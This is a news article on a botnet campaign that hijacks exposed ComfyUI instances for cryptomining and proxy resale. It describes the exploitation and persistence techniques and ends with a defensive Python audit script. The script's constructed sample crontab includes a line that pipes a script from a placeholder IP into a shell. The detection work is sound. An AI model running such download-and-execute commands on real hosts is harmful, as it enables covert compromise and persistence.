Over 1,000 Exposed ComfyUI Instances Targeted in Cryptomining Botnet Campaign

Cyber RT | April 9, 2026 | 3 min read

A campaign targets internet-exposed ComfyUI instances, exploiting misconfigurations for remote code execution to add them to a cryptocurrency mining and proxy botnet. A Python scanner identifies vulnerable nodes, installing malicious packages if necessary. Compromised hosts mine Monero and Conflux, managed via a Flask-based C2 dashboard. The attack leverages custom nodes for code execution, with persistence mechanisms ensuring continued operation. Recent updates enhance sandbox detection, process hiding, and lateral movement.

A recent campaign has been identified targeting internet-exposed instances of ComfyUI, a popular Stable Diffusion platform, to incorporate them into a cryptocurrency mining and proxy botnet. The campaign employs a Python scanner that continuously sweeps major cloud IP ranges for vulnerable targets and, if no exploitable node is already present, automatically installs a malicious node via ComfyUI-Manager.

The core of the attack involves scanning for exposed ComfyUI instances and exploiting a misconfiguration that allows remote code execution on unauthenticated deployments through custom nodes. Once exploited, the compromised hosts are added to a cryptomining operation that mines Monero via XMRig and Conflux via lolMiner, and to a Hysteria V2 botnet, all centrally managed through a Flask-based command-and-control (C2) dashboard. Although only a relatively small number of ComfyUI instances, over 1,000, are publicly accessible, that population is enough for threat actors to run opportunistic campaigns for financial gain.

Censys discovered the campaign after identifying an open directory on an IP address associated with Aeza Group, a bulletproof hosting provider. The directory contained a previously undocumented set of tools used to execute the attacks: reconnaissance tools that enumerate exposed ComfyUI instances across cloud infrastructure, identify those with ComfyUI-Manager installed, and shortlist those susceptible to the code execution exploit, and a Python script that functions as an exploitation framework, weaponizing ComfyUI's custom nodes to achieve code execution. The technique relies on the fact that some custom nodes accept raw Python code as input and execute it without requiring authentication. Attackers scan for the specific custom node families that support arbitrary code execution, turning the service into a channel for delivering attacker-controlled Python payloads.
A notable aspect of the attack is a malicious package, "ComfyUI-Shell-Executor," created by the attacker to fetch a next-stage shell script. This script disables shell history, kills competing miners, launches the miner process, and uses an LD_PRELOAD hook to hide a watchdog process that revives the miner if it is terminated.

Persistence is layered: the shell script is re-downloaded every six hours, the exploit workflow is re-executed whenever ComfyUI starts, the miner program is copied to multiple locations, and the miner binaries are locked with "chattr +i" so they cannot be deleted or modified. The attack also targets a specific competitor, "Hisana," overwriting its configuration to redirect mining output to the attacker's own wallet address and occupying Hisana's C2 port with a dummy Python listener.

Infected hosts are controlled via a Flask-based C2 panel, from which the operator can push instructions or deploy additional payloads, including a shell script that installs Hysteria V2 so the compromised nodes can be sold as proxies. Analysis of the attacker's shell command history also revealed an SSH login attempt linked to a worm campaign targeting exposed Redis database servers, pointing to a broader pattern of discovering and exploiting exposed services and then deploying custom tooling for persistence, scanning, or monetization.

The discovery of this campaign coincides with the emergence of multiple botnet campaigns exploiting various vulnerabilities to enlist devices or deliver malware for cryptocurrency mining and DDoS attacks. These campaigns reflect rising botnet activity, with significant surges noted in recent periods, driven by the availability of source code for botnets such as Mirai.
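As an added defensive example (not from the Censys research or this article), the script below audits three Linux host artifacts for the persistence and hiding techniques described above: files locked with chattr +i, entries in /etc/ld.so.preload, and cron jobs that pipe a downloaded script into a shell. All sample inputs are constructed; the file paths and IP address are placeholders, not indicators from the campaign.

```python
import re

# Constructed sample host artifacts for the demo (not indicators from the campaign):
# lsattr output, the contents of /etc/ld.so.preload, and a root crontab.
SAMPLE_LSATTR = """\
----i---------e------- /tmp/.cache/xmrig
--------------e------- /usr/bin/python3
"""
SAMPLE_LD_PRELOAD = "/tmp/.cache/hide.so\n"
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 */6 * * * curl -fsSL http://198.51.100.7/a.sh | sh
30 2 * * 0 /usr/bin/certbot renew
"""

def immutable_files(lsattr_output):
    """Paths carrying the 'i' flag that `chattr +i` sets; lsattr prints
    '<flags> <path>' and only the immutable attribute uses a lowercase i."""
    hits = []
    for line in lsattr_output.splitlines():
        parts = line.split(None, 1)
        if len(parts) == 2 and "i" in parts[0]:
            hits.append(parts[1])
    return hits

def preload_libraries(ld_preload_text):
    """Entries of /etc/ld.so.preload. The file is normally absent or empty, so
    any entry deserves review: it is how an LD_PRELOAD process-hiding hook persists."""
    return [l.strip() for l in ld_preload_text.splitlines()
            if l.strip() and not l.lstrip().startswith("#")]

PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")

def download_and_run_cron(crontab_text):
    """(schedule, command) for cron jobs that fetch a script and pipe it into a
    shell, such as a re-download every six hours ('0 */6 * * *')."""
    hits = []
    for line in crontab_text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        fields = line.split(None, 5)
        if len(fields) == 6 and PIPE_TO_SHELL.search(fields[5]):
            hits.append((" ".join(fields[:5]), fields[5]))
    return hits

def audit(lsattr_output, ld_preload_text, crontab_text):
    """Combine the three checks into a list of (category, detail) findings."""
    findings = [("immutable", p) for p in immutable_files(lsattr_output)]
    findings += [("ld.so.preload", p) for p in preload_libraries(ld_preload_text)]
    findings += [("cron", f"{s} {c}") for s, c in download_and_run_cron(crontab_text)]
    return findings
```

On a real host, feed the functions the output of `lsattr -R` over the directories of interest, the contents of /etc/ld.so.preload, and `crontab -l` for each user; every finding is a lead for review, not proof of compromise.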
The ComfyUI campaign continues to evolve, with updates focusing on sandbox detection, process hiding, competition killing, and lateral movement, demonstrating the ongoing refinement of the threat actors' tactics.